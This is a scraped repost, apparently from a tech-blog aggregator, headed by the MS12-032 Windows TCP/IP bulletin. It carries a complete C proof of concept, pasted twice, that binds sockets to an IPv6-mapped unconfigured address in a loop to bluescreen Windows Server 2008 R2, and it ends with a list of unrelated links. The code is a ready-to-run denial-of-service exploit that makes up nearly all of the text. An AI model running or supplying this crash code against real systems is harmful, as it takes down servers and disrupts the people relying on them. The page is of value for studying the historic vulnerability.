MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
来源:互联网 发布:bilibili mac客户端 编辑:程序博客网 时间:2024/06/04 23:53
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)
#include
#include
#include
#include
#define IPV6_V6ONLY 27
void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}
void main()
{
MyWsaStartup();
bool bindSuccess = false;
while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)
#include
#include
#include
#include
#define IPV6_V6ONLY 27
void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}
void main()
{
MyWsaStartup();
bool bindSuccess = false;
while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- Linux Kernel Samba Share Local Privilege Elevation Vulnerability
- Elevation of Privilege (EoP) Card Game
- MS08-066 Microsoft Ancillary Function Driver Elevation of Privilege exploit
- CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptiv
- Apache suEXEC Privilege Elevation / Information Disclosure
- Apache suEXEC Privilege Elevation / Information Disclosure
- Increasing the maximum number of tcp/ip connections in linux
- Debian 'login' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability
- MS12-032的POC
- Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
- Linux Kernel Controller Area Network Protocol Local Privilege Escalation Vulnerability
- Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
- MetaSploit Framework 'pcap_log' Plugin Local Privilege Escalation Vulnerability
- android里图片下载工具类AsyncImageLoader分析
- Web Application Penetration testing with Google Chrome Browser
- TemplateMethod模式
- android 开发中将十六进制 颜色代码 转换为int类型数值 方法 :
- aptana设置问题
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- 相对路径和绝对路径
- jni使用基础(五)之ndk常见错误
- container_of()宏--open()
- powerdesigner 15.1破解
- 修改Ext 3.3 Radio 的inputValue不能0的Bug
- Ubuntu 11.10 安装opencv2.3.1
- Vulnerability Assessment - Information Assurance Tools Report
- 说说猎豹安全浏览器